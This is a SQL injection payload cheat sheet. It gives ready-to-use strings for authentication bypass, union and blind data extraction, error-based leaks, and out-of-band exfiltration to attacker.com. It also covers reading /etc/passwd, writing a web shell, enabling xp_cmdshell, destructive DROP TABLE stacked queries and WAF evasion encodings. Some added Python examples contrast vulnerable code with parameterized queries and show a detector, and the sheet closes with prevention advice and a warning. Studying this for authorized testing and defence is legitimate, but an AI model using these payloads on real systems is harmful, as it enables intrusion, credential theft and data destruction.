SQL Injection Payloads
SQL Injection (SQLi) is a code injection technique that exploits security vulnerabilities in an application's database layer. Attackers can manipulate SQL queries to access, modify, or delete data, bypass authentication, and execute administrative operations.
Types of SQL Injection
In-Band SQLi
Results are directly returned in the application's response (Union-based, Error-based).
Inferential (Blind) SQLi
No direct data output; attackers infer information through application behavior (Boolean-based, Time-based).
Out-of-Band SQLi
Attacker receives data through a different channel (DNS, HTTP requests to external server).
Authentication Bypass
Basic Bypass Payloads
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
admin' --
admin'#
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR ('1'='1
') OR ('1'='1'--
') OR ('1'='1'#
Advanced Bypass
' OR 'x'='x
' OR 'something' LIKE 'some%
admin' OR '1'='1' --
' OR 1--'
' OR 1#'
' OR '1'='1' LIMIT 1--
' UNION SELECT NULL, NULL WHERE '1'='1' --
' UNION SELECT 'admin', 'password' WHERE '1'='1' --
Numeric Comparison Variants
admin' OR 1=1 OR 'a'='a
' OR 1=1 --
' OR 1=1 #
' OR 1=1 /*
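To make the mechanism behind the bypass payloads above concrete, here is an added example (not part of the original cheat sheet) using Python's built-in sqlite3 module: a login check built by string concatenation beside the same check with bound parameters. The table layout, the two user rows and the function names are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample data for the demonstration; not from any real system."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonderland")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: attacker-controlled text becomes part of the SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Bound parameters: values travel separately from the query text, so a quote
    or a comment marker inside the input is just data, never syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run two payloads from the list above against both versions of the check."""
    conn = make_db()
    results = {}
    # The tautology payload turns the WHERE clause into: username = '' OR '1'='1' -- ...
    results["tautology_vuln"] = login_vulnerable(conn, "' OR '1'='1' --", "anything")
    # The comment payload drops the password check entirely: username = 'admin' -- ...
    results["comment_vuln"] = login_vulnerable(conn, "admin' --", "anything")
    # With parameters the same strings are compared literally and match no row.
    results["tautology_param"] = login_parameterized(conn, "' OR '1'='1' --", "anything")
    results["comment_param"] = login_parameterized(conn, "admin' --", "anything")
    results["legit_param"] = login_parameterized(conn, "alice", "wonderland")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Both vulnerable calls return "admin" (the first row in the table), which is the authentication bypass; the parameterized calls return None for the payloads and "alice" only for valid credentials.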
Union-Based SQL Injection
UNION queries append the rows of an injected SELECT to the original result set, so the injected SELECT must return the same number of columns, with compatible types, as the original query.
Finding Number of Columns
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
...continue until error
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
...continue until query works
Data Extraction
' UNION SELECT username, password FROM users--
' UNION SELECT NULL, username || '~' || password FROM users--
' UNION SELECT table_name, NULL FROM information_schema.tables--
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users'--
Enumerate Database Information
-- MySQL
' UNION SELECT NULL, database()--
' UNION SELECT NULL, version()--
' UNION SELECT NULL, user()--
' UNION SELECT NULL, @@hostname--
-- PostgreSQL
' UNION SELECT NULL, current_database()--
' UNION SELECT NULL, version()--
' UNION SELECT NULL, current_user--
-- SQL Server
' UNION SELECT NULL, DB_NAME()--
' UNION SELECT NULL, @@version--
' UNION SELECT NULL, SYSTEM_USER--
-- Oracle
' UNION SELECT NULL, user FROM dual--
' UNION SELECT NULL, version FROM v$instance--
Error-Based SQL Injection
Extract data through database error messages.
MySQL
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--
' AND extractvalue(1,concat(0x7e,(SELECT database())))--
' AND updatexml(null,concat(0x7e,(SELECT database())),null)--
' OR 1 GROUP BY CONCAT_WS(0x3a,version(),database(),user()) HAVING MIN(0)--
SQL Server
' AND 1=CONVERT(INT,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS INT)--
PostgreSQL
' AND CAST((SELECT version()) AS INT)=1--
' AND 1::int=(SELECT version())::text::int--
Oracle
' AND CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))=1--
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE rownum=1))--
Blind SQL Injection
Boolean-Based
-- True condition
' AND 1=1--
-- False condition
' AND 1=2--
-- Character-by-character extraction
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97--
-- Length discovery
' AND LENGTH((SELECT password FROM users WHERE username='admin'))=8--
Conditional Responses
' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND password LIKE 'a%')=1--
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
Time-Based Blind SQL Injection
Infer data by observing response times.
MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING((SELECT database()),1,1)='a',SLEEP(5),0)--
' OR IF(ASCII(SUBSTRING((SELECT database()),1,1))>97,SLEEP(5),SLEEP(0))--
SQL Server
'; WAITFOR DELAY '00:00:05'--
'; IF (1=1) WAITFOR DELAY '00:00:05'--
'; IF (SELECT USER)='sa' WAITFOR DELAY '00:00:05'--
PostgreSQL
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
' OR (SELECT CASE WHEN (SELECT current_database())='target' THEN pg_sleep(5) ELSE pg_sleep(0) END) IS NOT NULL--
Oracle
' AND DBMS_LOCK.SLEEP(5)--
' OR (SELECT CASE WHEN (SELECT user FROM dual)='SYSTEM' THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual) IS NOT NULL--
Out-of-Band SQL Injection
DNS Exfiltration
MySQL (Windows):
' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.attacker.com\\a'))--
SQL Server:
'; EXEC master..xp_dirtree '\\\\'+@@version+'.attacker.com\\a'--
'; DECLARE @q VARCHAR(1024); SET @q='\\\\'+DB_NAME()+'.attacker.com\\a'; EXEC master..xp_dirtree @q--
Oracle:
' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/'||(SELECT user FROM dual)||'"> %remote;]>'),'/l') FROM dual--
HTTP Requests
SQL Server:
'; EXEC master..xp_cmdshell 'nslookup attacker.com'--
PostgreSQL:
' UNION SELECT NULL, content FROM pg_read_file('network://attacker.com/file')--
Second-Order SQL Injection
The payload is stored harmlessly by the first query (often one that is parameterized) and only takes effect when a later query reuses the stored value without parameterization.
-- First request (Registration)
username: admin'--
email: test@example.com
-- Second request (Profile update using stored username)
-- The stored username "admin'--" is used unsafely in an UPDATE query
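The two-request flow sketched above, as an added example that is not part of the original cheat sheet: the registration INSERT is parameterized, so the username admin'-- is stored verbatim, and the later profile UPDATE trusts the value read back from the database. The sqlite3 schema, the seeded admin row and the function names are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample data: one legitimate admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, email TEXT)")
    conn.execute("INSERT INTO users (username, email) VALUES ('admin', 'admin@example.com')")
    conn.commit()
    return conn


def register(conn, username, email):
    """First request: parameterized, so the payload is stored exactly as typed and does nothing yet."""
    conn.execute("INSERT INTO users (username, email) VALUES (?, ?)", (username, email))
    conn.commit()


def update_email_vulnerable(conn, session_username, new_email):
    """Second request: the username came out of our own database, so it is wrongly
    treated as trusted and concatenated into the UPDATE."""
    sql = "UPDATE users SET email = '%s' WHERE username = '%s'" % (new_email, session_username)
    conn.execute(sql)
    conn.commit()


def update_email_safe(conn, session_username, new_email):
    """Same UPDATE with both values bound; the stored quote and comment marker stay inert."""
    conn.execute("UPDATE users SET email = ? WHERE username = ?", (new_email, session_username))
    conn.commit()


def email_of(conn, username):
    row = conn.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None


def demo(use_safe):
    """Register the payload username, then run the profile update the way the app would."""
    conn = make_db()
    register(conn, "admin'--", "test@example.com")
    # The application reads the username back from the database for the logged-in session.
    stored = conn.execute("SELECT username FROM users WHERE email = ?",
                          ("test@example.com",)).fetchone()[0]
    update = update_email_safe if use_safe else update_email_vulnerable
    update(conn, stored, "attacker@example.com")
    return {"admin": email_of(conn, "admin"), "attacker": email_of(conn, "admin'--")}


if __name__ == "__main__":
    print("vulnerable:", demo(use_safe=False))
    print("safe:      ", demo(use_safe=True))
```

With the concatenated UPDATE the WHERE clause becomes username = 'admin'--', so the admin account's e-mail is overwritten while the attacker's own row is untouched; with bound parameters only the attacker's row changes. The defensive point is that "came from the database" is not a trust boundary: every value must be bound at every query that uses it.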
Database-Specific Payloads
MySQL
-- Version
' UNION SELECT NULL, @@version--
-- Current User
' UNION SELECT NULL, user()--
-- Database Name
' UNION SELECT NULL, database()--
-- Tables
' UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_schema=database()--
-- Columns
' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users'--
-- File Reading
' UNION SELECT NULL, LOAD_FILE('/etc/passwd')--
-- File Writing
' UNION SELECT NULL, 'shell code' INTO OUTFILE '/var/www/html/shell.php'--
-- Command Execution (UDF)
'; SELECT sys_exec('whoami')--
PostgreSQL
-- Version
' UNION SELECT NULL, version()--
-- Current User
' UNION SELECT NULL, current_user--
-- Database Name
' UNION SELECT NULL, current_database()--
-- Tables
' UNION SELECT NULL, tablename FROM pg_tables WHERE schemaname='public'--
-- Columns
' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users'--
-- File Reading
' UNION SELECT NULL, pg_read_file('/etc/passwd',0,200)--
-- Command Execution
'; COPY (SELECT '') TO PROGRAM 'whoami'--
SQL Server
-- Version
' UNION SELECT NULL, @@version--
-- Current User
' UNION SELECT NULL, SYSTEM_USER--
-- Database Name
' UNION SELECT NULL, DB_NAME()--
-- Tables
' UNION SELECT NULL, name FROM sys.tables--
-- Columns
' UNION SELECT NULL, name FROM sys.columns WHERE object_id=OBJECT_ID('users')--
-- Command Execution
'; EXEC xp_cmdshell 'whoami'--
-- Enable xp_cmdshell
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
Oracle
-- Version
' UNION SELECT NULL, banner FROM v$version--
-- Current User
' UNION SELECT NULL, user FROM dual--
-- Tables
' UNION SELECT NULL, table_name FROM all_tables--
-- Columns
' UNION SELECT NULL, column_name FROM all_tab_columns WHERE table_name='USERS'--
-- Privilege Escalation
' UNION SELECT NULL, granted_role FROM user_role_privs--
SQLite
-- Version
' UNION SELECT NULL, sqlite_version()--
-- Tables
' UNION SELECT NULL, name FROM sqlite_master WHERE type='table'--
-- Schema
' UNION SELECT NULL, sql FROM sqlite_master WHERE type='table' AND name='users'--
-- Columns (via pragma)
' UNION SELECT NULL, name FROM pragma_table_info('users')--
WAF Evasion Techniques
Whitespace Manipulation
'/**/OR/**/1=1--
'/*!OR*/1=1--
'+OR+1=1--
'%0aOR%0a1=1--
'%09OR%091=1--
'%0dOR%0d1=1--
Case Variation
' Or 1=1--
' oR 1=1--
' UnIoN SeLeCt--
Comment Injection
'/**/UNION/**/SELECT--
'UN/**/ION/**/SE/**/LECT--
'UNI%00ON SEL%00ECT--
Encoding
-- URL Encoding
%27%20OR%20%271%27%3D%271
%27%20UNION%20SELECT--
-- Double URL Encoding
%2527%2520OR%2520%25271%2527%253D%25271
-- Unicode
\u0027 OR \u0031=\u0031--
-- Hex Encoding
0x27204f5220313d312d2d
Alternative Syntax
' || '1'='1
' OR 1 LIKE 1--
' OR 1 REGEXP 1--
' OR 1 BETWEEN 0 AND 2--
' OR 'a'<>'b'--
Null Byte
'%00 OR 1=1--
' OR%001=1--
Scientific Notation
' OR 1e0=1--
' OR 0x1=1--
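Every technique in the evasion lists above targets a detector that matches the raw request string. The added example below (not part of the original cheat sheet) shows the defender's counterpart: normalize a parameter value the way a database tokenizer would see it, then match signatures against the normalized forms. The sample values are taken from the lists above plus constructed benign inputs; the function names and the two signatures are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_plus

EXEC_COMMENT = re.compile(r"/\*!\s*(.*?)\s*\*/", re.S)   # MySQL /*!...*/: contents are executed
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)           # ordinary inline comment


def normalize(value, max_decode=3):
    """Return the candidate forms a database engine might see for one parameter value."""
    for _ in range(max_decode):               # bounded re-decoding covers double URL encoding
        decoded = unquote_plus(value)         # also turns form-encoded '+' into a space
        if decoded == value:
            break
        value = decoded
    value = value.replace("\x00", "")         # null bytes that some parsers silently drop
    value = EXEC_COMMENT.sub(r" \1 ", value)  # keep the executable part of /*!...*/
    # An inline comment may act as whitespace or be swallowed entirely; check both readings.
    variants = (PLAIN_COMMENT.sub(" ", value), PLAIN_COMMENT.sub("", value))
    return [re.sub(r"\s+", " ", v).strip().lower() for v in variants]


SIGNATURES = {
    # OR followed by the same token on both sides of = or LIKE, quoted or not (x=x, 'x'='x)
    "tautology": re.compile(r"\bor\b\s*'?(\w+)'?\s*(?:=|like)\s*'?\1"),
    "union_select": re.compile(r"\bunion\b\s*\bselect\b"),
}


def classify(value):
    """Names of the signatures that match any normalized form of the value."""
    hits = set()
    for form in normalize(value):
        for name, pattern in SIGNATURES.items():
            if pattern.search(form):
                hits.add(name)
    return hits


def naive_classify(value):
    """A literal-substring check of the kind the evasion payloads above are written to defeat."""
    upper = value.upper()
    return {name for name, needle in (("tautology", "' OR 1=1"), ("union_select", "UNION SELECT"))
            if needle in upper}


# Constructed request parameter values: evasion payloads from the lists above plus benign text.
SAMPLES = [
    "' OR 1=1--",
    "'/**/OR/**/1=1--",
    "'/*!OR*/1=1--",
    "'+OR+1=1--",
    "'%0aOR%0a1=1--",
    "'%09OR%091=1--",
    "%27%20OR%20%271%27%3D%271",
    "%2527%2520OR%2520%25271%2527%253D%25271",
    "' oR 1=1--",
    "'UNI%00ON SEL%00ECT--",
    "' OR 1 LIKE 1--",
    "O'Reilly",          # benign apostrophe
    "books or movies",   # benign use of the word "or"
]


def report():
    """Map each sample to (naive hits, normalized hits) so the two detectors can be compared."""
    return {s: (sorted(naive_classify(s)), sorted(classify(s))) for s in SAMPLES}


if __name__ == "__main__":
    for sample, (naive, normalized) in report().items():
        print(f"{sample!r:45} naive={naive} normalized={normalized}")
```

The literal check catches only the first sample; the normalized check flags every payload and neither benign string. Normalization is not a substitute for parameterized queries (a determined sender can still find a reading the normalizer does not model), but it is what turns a WAF or log-monitoring rule from trivially bypassable into useful telemetry.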
Stacked Queries
Terminate the original statement with a semicolon and append further statements; this only works where the driver or API allows more than one statement per call.
MySQL / SQL Server
'; DROP TABLE users--
'; INSERT INTO users (username, password) VALUES ('hacker', 'password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
'; EXEC xp_cmdshell 'whoami'--
PostgreSQL
'; DROP TABLE users CASCADE--
'; CREATE TABLE evil AS SELECT * FROM users--
'; COPY (SELECT '') TO PROGRAM 'whoami'--
Advanced Techniques
Routed SQL Injection
-- Exploiting second-order injection through stored procedures
CALL update_user_profile('admin''--', 'new_email@example.com');
JSON/XML SQL Injection
{
"username": "admin' OR '1'='1'--",
"password": "anything"
}
Encoded Payload
-- Base64 encoded
' UNION SELECT FROM_BASE64('c2VsZWN0IHVzZXIoKQ==')--
Polyglot SQL Injection
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
Prevention Best Practices
- Prepared Statements / Parameterized Queries: Use bound parameters instead of string concatenation
- Stored Procedures: Encapsulate SQL logic (ensure they don't use dynamic SQL)
- Input Validation: Whitelist allowed characters and patterns
- ORM Frameworks: Use Object-Relational Mapping tools properly
- Least Privilege: Database users should have minimal necessary permissions
- WAF: Implement Web Application Firewalls with updated rules
- Error Handling: Don't expose detailed SQL errors to users
- Escaping: Escape special characters (last resort, prefer parameterization)
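Parameterized queries, input validation and escaping from the list above each cover a different part of a query, which is easy to miss when reading the list alone. The added example below (not part of the original cheat sheet) builds a user search in Python with sqlite3: the search term is bound as a parameter, the ORDER BY column and direction are checked against an allow-list because placeholders cannot stand in for identifiers or keywords, and LIKE wildcards in the term are escaped since binding alone does not neutralize them. The table, the sample rows and all function names are constructed for the demonstration.

```python
import sqlite3

# Allow-list of identifiers the application is willing to interpolate; anything else is rejected.
ALLOWED_SORT_COLUMNS = {"username", "created_at"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


class InvalidQueryParameter(ValueError):
    """Raised for a sort column or direction outside the allow-list."""


def escape_like(term):
    """Escape LIKE metacharacters so the bound term is matched literally (escape char is backslash)."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def build_user_search(term, sort_column="username", direction="ASC"):
    """Return (sql, params): the value is bound, the identifiers are validated, never concatenated raw."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise InvalidQueryParameter("unsupported sort column")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise InvalidQueryParameter("unsupported sort direction")
    sql = (f"SELECT username FROM users WHERE username LIKE ? ESCAPE '\\' "
           f"ORDER BY {sort_column} {direction}")
    return sql, (escape_like(term) + "%",)


def search_users(conn, term, sort_column="username", direction="ASC"):
    """Prefix search; engine errors are swallowed here so no SQL detail reaches the client."""
    sql, params = build_user_search(term, sort_column, direction)
    try:
        return [row[0] for row in conn.execute(sql, params)]
    except sqlite3.Error:
        # In a real service: log the exception server-side with a correlation id.
        return []


def make_db():
    """Constructed sample data for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, created_at TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "2024-01-01"), ("alice", "2024-02-01"), ("bob", "2024-03-01")])
    conn.commit()
    return conn


def demo():
    conn = make_db()
    out = {}
    out["prefix"] = search_users(conn, "a")                              # ['admin', 'alice']
    out["prefix_desc"] = search_users(conn, "a", "created_at", "desc")   # ['alice', 'admin']
    out["wildcard"] = search_users(conn, "%")                            # [] : '%' is literal
    out["payload"] = search_users(conn, "' OR '1'='1' --")               # [] : just a string
    try:
        search_users(conn, "a", "username; DROP TABLE users--")
        out["bad_sort"] = "accepted"
    except InvalidQueryParameter:
        out["bad_sort"] = "rejected"
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Note the division of labour: the bound parameter makes the tautology payload a harmless literal, the allow-list (a positive pattern, not a blacklist of characters) is what protects the ORDER BY clause, and LIKE escaping addresses a data-exposure problem that parameterization does not touch. Combine this with a database account limited to the tables and verbs the application needs so that any injection that does slip through has little to reach.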
Testing Tools
- SQLMap - Automated SQL injection tool
- jSQL Injection - Java-based SQL injection tool
- Havij - Automated SQL injection tool
- Burp Suite - Web application security testing
- OWASP ZAP - Security scanner
- NoSQLMap - For NoSQL injection testing
⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal and punishable by law.